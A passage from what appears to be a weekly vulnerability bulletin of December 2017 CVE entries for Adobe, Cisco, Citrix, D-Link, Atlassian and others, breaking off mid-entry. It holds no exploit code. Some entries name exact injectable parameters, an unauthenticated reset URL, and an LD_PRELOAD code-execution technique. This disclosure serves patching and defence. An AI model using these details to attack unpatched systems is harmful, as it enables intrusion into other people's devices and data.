adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the image conversion module, when processing GIF files. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space.2017-12-099.3CVE-2017-16410
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the WebCapture module, related to an internal hash table implementation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16411
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_readerAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS conversion module, when handling a JPEG resource. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16412
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the XPS to PDF conversion module, when processing TIFF files. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16413
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript API module responsible for form field computation. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16414
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is a part of the functionality that handles font encodings. The vulnerability is a result of out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16415
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the image conversion module that handles Enhanced Metafile Format Plus (EMF+) data. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-099.3CVE-2017-16416
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the font parsing module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16417
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the image conversion module that handles XPS files. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16418
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is in the part of the JavaScript engine that handles annotation abstraction. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-099.3CVE-2017-16420
BID
SECTRACK
CONFIRM
adobe -- photoshopAn issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-097.5CVE-2017-11303
BID
SECTRACK
CONFIRM
adobe -- photoshopAn issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable use-after-free vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-097.5CVE-2017-11304
BID
SECTRACK
CONFIRM
Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability when handling XFDF files.2017-12-094.3CVE-2017-16361
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability in the AcroPDF plugin.2017-12-095.0CVE-2017-16366
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a Same Origin Policy security bypass vulnerability, affecting files on the local system, etc.2017-12-094.3CVE-2017-16369
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The issue is a stack exhaustion problem within the JavaScript API, where the computation does not correctly control the amount of recursion that can happen with respect to system resources.2017-12-094.3CVE-2017-16419
BID
SECTRACK
CONFIRM
adobe -- connectAn issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.2017-12-094.3CVE-2017-11287
BID
SECTRACK
CONFIRM
adobe -- connectAn issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.2017-12-094.3CVE-2017-11288
BID
SECTRACK
CONFIRM
adobe -- connectAn issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.2017-12-094.3CVE-2017-11289
BID
SECTRACK
CONFIRM
adobe -- connectAn issue was discovered in Adobe Connect 9.6.2 and earlier versions. A UI Redress (or Clickjacking) vulnerability exists. This issue has been resolved by adding a feature that enables Connect administrators to protect users from UI redressing (or clickjacking) attacks.2017-12-094.3CVE-2017-11290
BID
SECTRACK
CONFIRM
adobe -- connectAn issue was discovered in Adobe Connect 9.6.2 and earlier versions. A Server-Side Request Forgery (SSRF) vulnerability exists that could be abused to bypass network access controls.2017-12-096.4CVE-2017-11291
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. Adobe Digital Editions parses crafted XML files in an unsafe manner, which could lead to sensitive information disclosure.2017-12-094.3CVE-2017-11273
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-095.0CVE-2017-11297
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-095.0CVE-2017-11298
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-095.0CVE-2017-11299
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-095.0CVE-2017-11300
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-095.0CVE-2017-11301
BID
SECTRACK
CONFIRM
adobe -- experience_managerAn issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. A cross-site scripting vulnerability in Apache Sling Servlets Post 2.3.20 has been resolved in Adobe Experience Manager.2017-12-094.3CVE-2017-11296
BID
SECTRACK
CONFIRM
adobe -- experience_managerAn issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Adobe Experience Manager has a reflected cross-site scripting vulnerability in the HtmlRendererServlet.2017-12-094.3CVE-2017-3109
BID
SECTRACK
CONFIRM
adobe -- experience_managerAn issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Sensitive tokens are included in http GET requests under certain circumstances.2017-12-095.0CVE-2017-3111
BID
SECTRACK
CONFIRM
Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
There were no low vulnerabilities recorded this week.
Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product		DescriptionPublishedCVSS ScoreSource & Patch Info
abiword -- abiword
 		af/util/xp/ut_go_file.cpp in AbiWord 3.0.2-2 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17529
MISC
acdsee -- acdsee_ultimate_10.0.0.292
 		A memory corruption vulnerability exists in the .PSD parsing functionality of ACDSee Ultimate 10.0.0.292. A specially crafted .PSD file can cause an out of bounds write vulnerability resulting in potential code execution. An attacker can send a specific .PSD file to trigger this vulnerability.2017-12-11not yet calculatedCVE-2017-2886
BID
MISC
acti -- acti_cameras
 		ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC use non-random default credentials across all devices. A remote attacker can take complete control of a device using default admin credentials.2017-12-15not yet calculatedCVE-2017-3186
BID
MISC
MISC
CERT-VN
acti -- acti_cameras
 		ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC fail to properly restrict access to the factory reset page. An unauthenticated, remote attacker can exploit this vulnerability by directly accessing the http://x.x.x.x/setup/setup_maintain_firmware-default.html page. This will allow an attacker to perform a factory reset on the device, leading to a denial of service condition or the ability to make use of default credentials (CVE-2017-3186).2017-12-15not yet calculatedCVE-2017-3184
BID
MISC
MISC
CERT-VN
acti -- acti_cameras
 		ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC have a web application that uses the GET method to process requests that contain sensitive information such as user account name and password, which can expose that information through the browser's history, referrers, web logs, and other sources.2017-12-15not yet calculatedCVE-2017-3185
BID
MISC
MISC
CERT-VN
adobe -- acrobat
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11293
BID
SECTRACK
CONFIRM
adobe -- dng
 		An issue was discovered in Adobe DNG Converter 9.12.1 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11295
BID
CONFIRM
adobe -- flash_playerAn issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK metadata functionality. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11225
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash_player
 		An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of providing language- and region- or country- specific functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-3114
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash_player
 		An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11215
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash_player

 		An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer due to an integer overflow; the computation is part of the abstraction that creates an arbitrarily sized transparent or opaque bitmap image. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-11213
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash_player
 		A regression affecting Adobe Flash Player version 27.0.0.187 (and earlier versions) causes the unintended reset of the global settings preference file when a user clears browser data.2017-12-13not yet calculatedCVE-2017-11305
BID
SECTRACK
CONFIRM
adobe -- flash_player
 		An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of AdobePSDK metadata. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-3112
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- indesign
 		An issue was discovered in Adobe InDesign 12.1.0 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11302
BID
SECTRACK
CONFIRM
adobe -- shockwave
 		An issue was discovered in Adobe Shockwave 12.2.9.199 and earlier. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11294
BID
SECTRACK
CONFIRM
amag_technologies -- symmetry_edge_network_door_controllers
 		Incorrect access control in AMAG Symmetry Door Edge Network Controllers (EN-1DBC Boot App 23611 03.60 and STD App 23603 03.60; EN-2DBC Boot App 24451 01.00 and STD App 2461 01.00) enables remote attackers to execute door controller commands (e.g., lock, unlock, add ID card value) by sending unauthenticated requests to the affected devices via Serial over TCP/IP, as demonstrated by a Ud command.2017-12-09not yet calculatedCVE-2017-16241
MISC
MISC
MISC
apache -- fineract
 		In Apache Fineract 0.4.0-incubating, 0.5.0-incubating, and 0.6.0-incubating, an authenticated user with client/loan/center/staff/group read permissions is able to inject malicious SQL into SELECT queries. The 'sqlSearch' parameter on a number of endpoints is not sanitized and appended directly to the query.2017-12-14not yet calculatedCVE-2017-5663
MLIST
apache -- synapse
 		Due to the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions, Apache Synapse 3.0.0 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. To mitigate the issue upgrading to 3.0.1 version is required. In Synapse 3.0.1 version, Commons Collection has been updated to 3.2.2 version which contains the fix for the above mentioned vulnerability.2017-12-11not yet calculatedCVE-2017-15708
BID
MLIST
asterisk -- multiple_products
 		A Remote Crash issue was discovered in Asterisk Open Source 13.x before 13.18.4, 14.x before 14.7.4, and 15.x before 15.1.4 and Certified Asterisk before 13.13-cert9. Certain compound RTCP packets cause a crash in the RTCP Stack.2017-12-13not yet calculatedCVE-2017-17664
MISC
BID
MISC
MISC
atlassian -- bamboo
 		Bamboo did not check that the name of a branch in a Mercurial repository contained argument parameters. An attacker who has permission to create a repository in Bamboo, edit an existing plan that has a non-linked Mercurialrepository, create or edit a plan when there is at least one linked Mercurial repository that the attacker has permission to use, or commit to a Mercurial repository used by a Bamboo plan which has branch detection enabled can execute code of their choice on systems that run a vulnerable version of Bamboo Server. Versions of Bamboo starting with 2.7.0 before 6.1.6 (the fixed version for 6.1.x) and from 6.2.0 before 6.2.5 (the fixed version for 6.2.x) are affected by this vulnerability.2017-12-13not yet calculatedCVE-2017-14590
BID
CONFIRM
CONFIRM
atlassian -- bamboo
 		It was possible for double OGNL evaluation in FreeMarker templates through Struts FreeMarker tags to occur. An attacker who has restricted administration rights to Bamboo or who hosts a website that a Bamboo administrator visits, is able to exploit this vulnerability to execute Java code of their choice on systems that run a vulnerable version of Bamboo. All versions of Bamboo before 6.1.6 (the fixed version for 6.1.x) and from 6.2.0 before 6.2.5 (the fixed version for 6.2.x) are affected by this vulnerability.2017-12-13not yet calculatedCVE-2017-14589
BID
CONFIRM
CONFIRM
aubio -- aubio
 		A NULL pointer dereference (DoS) Vulnerability was found in the function aubio_source_avcodec_readframe in io/source_avcodec.c of aubio 0.4.6, which may lead to DoS when playing a crafted audio file.2017-12-11not yet calculatedCVE-2017-17554
MISC
bernard_parisse_giac -- bernard_parisse_giacInput.cc in Bernard Parisse Giac 1.2.3.57 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17526
MISC
bob_hepple_gjots2 -- bob_hepple_gjots2
 		lib/gui.py in Bob Hepple gjots2 2.4.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17535
MISC

boxug -- trape


 		Trape before 2017-11-05 has XSS via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter.2017-12-16not yet calculatedCVE-2017-17714
MISC
MISC
MISC

boxug -- trape


 		Trape before 2017-11-05 has SQL injection via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter.2017-12-16not yet calculatedCVE-2017-17713
MISC
MISC
MISC
MISC
MISC
cisco -- asa_5500_series_routers
 		A vulnerability in the TLS protocol implementation of legacy Cisco ASA 5500 Series (ASA 5505, 5510, 5520, 5540, and 5550) devices could allow an unauthenticated, remote attacker to access sensitive information, aka a Return of Bleichenbacher's Oracle Threat (ROBOT) attack. An attacker could iteratively query a server running a vulnerable TLS stack implementation to perform cryptanalytic operations that may allow decryption of previously captured TLS sessions. Cisco Bug IDs: CSCvg97652.2017-12-15not yet calculatedCVE-2017-12373
CONFIRM
citrix -- multiple_productsCitrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 might allow remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, aka a ROBOT attack.2017-12-13not yet calculatedCVE-2017-17382
BID
SECTRACK
MISC
CONFIRM
CERT-VN
citrix -- multiple_products
 		Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 allow remote attackers to obtain sensitive information from the backend client TLS handshake by leveraging use of TLS with Client Certificates and a Diffie-Hellman Ephemeral (DHE) key exchange.2017-12-13not yet calculatedCVE-2017-17549
BID
SECTRACK
CONFIRM
commvault -- edge_communication_service
 		Commvault Edge Communication Service (cvd) prior to version 11 SP7 or version 11 SP6 with hotfix 590 is prone to a stack-based buffer overflow vulnerability that could lead to arbitrary code execution with administrative privileges.2017-12-15not yet calculatedCVE-2017-3195
CONFIRM
MISC
BID
EXPLOIT-DB
CERT-VN
crowdfunding_software -- realestate_crowdfunding_script
 		Realestate Crowdfunding Script 2.7.2 has SQL Injection via the single-cause.php pid parameter.2017-12-13not yet calculatedCVE-2017-17591
MISC
d-link -- dir-130_firmware_version_1.23_and_dir-330_firmware_version_1.12
 		D-Link DIR-130 firmware version 1.23 and DIR-330 firmware version 1.12 are vulnerable to authentication bypass of the remote login page. A remote attacker that can access the remote management login page can manipulate the POST request in such a manner as to access some administrator-only pages such as tools_admin.asp without credentials.2017-12-15not yet calculatedCVE-2017-3191
MISC
CERT-VN
MISC
MISC
d-link -- dir-130_firmware_version_1.23_and_dir-330_firmware_version_1.12
 		D-Link DIR-130 firmware version 1.23 and DIR-330 firmware version 1.12 do not sufficiently protect administrator credentials. The tools_admin.asp page discloses the administrator password in base64 encoding in the returned web page. A remote attacker with access to this page (potentially through a authentication bypass such as CVE-2017-3191) may obtain administrator credentials for the device.2017-12-15not yet calculatedCVE-2017-3192
MISC
CERT-VN
MISC
MISC
d-link -- multiple_devices
 		Multiple D-Link devices including the DIR-850L firmware versions 1.14B07 and 2.07.B05 contain a stack-based buffer overflow vulnerability in the web administration interface HNAP service.2017-12-15not yet calculatedCVE-2017-3193
BID
MISC
MISC
CERT-VN
MISC
elemental_path -- cognitoys_dino_smart_toys
 		Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 share a fixed small pool of hardcoded keys, allowing a remote attacker to use a different Dino device to decrypt VoIP traffic between a child's Dino and remote server.2017-12-11not yet calculatedCVE-2017-8866
MISC
elemental_path -- cognitoys_dino_smart_toys
 		Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 use AES-128 with ECB mode to encrypt voice traffic between the device and remote server, allowing a malicious user to map encrypted traffic to a particular AES key index and gaining further access to eavesdrop on privacy-sensitive voice communication of a child and their Dino device.2017-12-11not yet calculatedCVE-2017-8867
MISC
elemental_path -- cognitoys_dino_smart_toys
 		Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 do not provide sufficient protections against capture-replay attacks, allowing an attacker on the network to replay VoIP traffic between a Dino device and remote server to any other Dino device.2017-12-11not yet calculatedCVE-2017-8865
MISC
embedthis -- goahead
 		Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. This is a result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters in the cgiHandler function in cgi.c. When combined with the glibc dynamic linker, this behaviour can be abused for remote code execution using special parameter names such as LD_PRELOAD. An attacker can POST their shared object payload in the body of the request, and reference it using /proc/self/fd/0.2017-12-12not yet calculatedCVE-2017-17562
MISC
MISC
emc -- isilon_onefs
 		In EMC Isilon OneFS 8.1.0.0, 8.0.1.0 - 8.0.1.1, 8.0.0.0 - 8.0.0.4, 7.2.1.0 - 7.2.1.5, 7.2.0.x, and 7.1.1.x, a malicious compliance admin (compadmin) account user could exploit a vulnerability in isi_get_itrace or isi_get_profile maintenance scripts to run any shell script as system root on a cluster in compliance mode. This could potentially lead to an elevation of privilege for the compadmin user and violate compliance mode.2017-12-13not yet calculatedCVE-2017-14380
CONFIRM
erlang -- erlang
 		The Erlang otp TLS server answers with different TLS alerts to different error types in the RSA PKCS #1 1.5 padding. This allows an attacker to decrypt content or sign messages with the server's private key (this is a variation of the Bleichenbacher attack).2017-12-12not yet calculatedCVE-2017-1000385
MLIST
MLIST
MLIST
BID
MISC
DEBIAN
CERT-VN
exiv2 -- exiv2
 		There is a heap-based buffer over-read in the Exiv2::Internal::PngChunk::keyTXTChunk function of pngchunk_int.cpp in Exiv2 0.26. A crafted PNG file will lead to a remote denial of service attack.2017-12-13not yet calculatedCVE-2017-17669
MISC
ffmpeg -- libswresample
 		The swri_audio_convert function in audioconvert.c in FFmpeg libswresample through 3.0.101, as used in FFmpeg 3.4.1, aubio 0.4.6, and other products, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted audio file.2017-12-11not yet calculatedCVE-2017-17555
MISC
flash_seats -- flash_seats_mobile_app_for_android
 		Flash Seats Mobile App for Android version 1.7.9 and earlier and for iOS version 1.9.51 and earlier fails to properly validate SSL certificates provided by HTTPS connections, which may enable an attacker to conduct man-in-the-middle (MITM) attacks.2017-12-15not yet calculatedCVE-2017-3190
BID
CERT-VN
MISC
flippa-clone.com -- website_auction_marketplace
 		Website Auction Marketplace 2.0.5 has SQL Injection via the search.php cat_id parameter.2017-12-13not yet calculatedCVE-2017-17592
MISC
fontforge -- fontforge
 		uiutil.c in FontForge through 20170731 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, a different vulnerability than CVE-2017-17534.2017-12-14not yet calculatedCVE-2017-17521
MISC
fortinet -- forticlient_fortios
 		An Information Disclosure vulnerability in Fortinet FortiOS 5.6.0 to 5.6.2, 5.4.0 to 5.4.5, 5.2 and below versions allow an admin user with super_admin privileges to view the current SSL VPN web portal session info which may contains user credentials through the fnsysctl CLI command.2017-12-13not yet calculatedCVE-2017-7738
BID
CONFIRM
fortinet -- forticlient_windows
 		A privilege escalation in Fortinet FortiClient Windows 5.4.3 and earlier as well as 5.6.0 allows attacker to gain privilege via exploiting the Windows "security alert" dialog thereby popping up when the "VPN before logon" feature is enabled and an untrusted certificate chain.2017-12-14not yet calculatedCVE-2017-7344
BID
CONFIRM
fortinet -- forticlient
 		An Information Disclosure vulnerability in Fortinet FortiClient for Windows 5.6.0 and below versions, FortiClient for Mac OSX 5.6.0 and below versions and FortiClient SSLVPN Client for Linux 4.4.2334 and below versions allows regular users to see each other's VPN authentication credentials due to improperly secured storage locations.2017-12-15not yet calculatedCVE-2017-14184
BID
CONFIRM
fortunescripts.com -- N/A
 		Basic Job Site Script 2.0.5 has SQL Injection via the keyword parameter to /job.2017-12-13not yet calculatedCVE-2017-17642
MISC
fs -- amazon_clone
 		FS Amazon Clone 1.0 has SQL Injection via the PATH_INFO to /VerAyari.2017-12-13not yet calculatedCVE-2017-17572
MISC
fs -- care_cloneFS Care Clone 1.0 has SQL Injection via the searchJob.php jobType or jobFrequency parameter.2017-12-13not yet calculatedCVE-2017-17574
MISC
fs -- crowdfunding_clone
 		FS Crowdfunding Script 1.0 has SQL Injection via the latest_news_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17578
MISC
fs -- expedia_clone
 		FS Expedia Clone 1.0 has SQL Injection via the pages.php or content.php id parameter, or the show-flight-result.php fl_orig or fl_dest parameter.2017-12-13not yet calculatedCVE-2017-17570
MISC
fs -- expedia_clone
 		FS Ebay Clone 1.0 has SQL Injection via the product.php id parameter, or the search.php category_id or sub_category_id parameter.2017-12-13not yet calculatedCVE-2017-17573
MISC
fs -- foodpanda_clone
 		FS Foodpanda Clone 1.0 has SQL Injection via the /food keywords parameter.2017-12-13not yet calculatedCVE-2017-17571
MISC
fs -- freelancer_clone
 		FS Freelancer Clone 1.0 has SQL Injection via the profile.php u parameter.2017-12-13not yet calculatedCVE-2017-17579
MISC
fs -- gigs_clone
 		FS Gigs Script 1.0 has SQL Injection via the browse-category.php cat parameter, browse-scategory.php sc parameter, or service-provider.php ser parameter.2017-12-13not yet calculatedCVE-2017-17576
MISC
fs -- groupon_clone
 		FS Groupon Clone 1.0 has SQL Injection via the item_details.php id parameter or the vendor_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17575
MISC
fs -- grubhub_clone
 		FS Grubhub Clone 1.0 has SQL Injection via the /food keywords parameter.2017-12-13not yet calculatedCVE-2017-17582
MISC
fs -- imdb_clone
 		FS IMDB Clone 1.0 has SQL Injection via the movie.php f parameter, tvshow.php s parameter, or show_misc_video.php id parameter.2017-12-13not yet calculatedCVE-2017-17588
MISC
fs -- indiamart_clone
 		FS Indiamart Clone 1.0 has SQL Injection via the catcompany.php token parameter, buyleads-details.php id parameter, or company/index.php c parameter.2017-12-13not yet calculatedCVE-2017-17587
MISC
fs -- linkedin_clone
 		FS Linkedin Clone 1.0 has SQL Injection via the group.php grid parameter, profile.php fid parameter, or company_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17580
MISC
fs -- makemytrip_clone
 		FS Makemytrip Clone 1.0 has SQL Injection via the show-flight-result.php fl_orig or fl_dest parameter.2017-12-13not yet calculatedCVE-2017-17584
MISC
fs -- monster_clone
 		FS Monster Clone 1.0 has SQL Injection via the Employer_Details.php id parameter.2017-12-13not yet calculatedCVE-2017-17585
MISC
fs -- olx_clone
 		FS Olx Clone 1.0 has SQL Injection via the subpage.php scat parameter or the message.php pid parameter.2017-12-13not yet calculatedCVE-2017-17586
MISC
fs -- quibids_clone
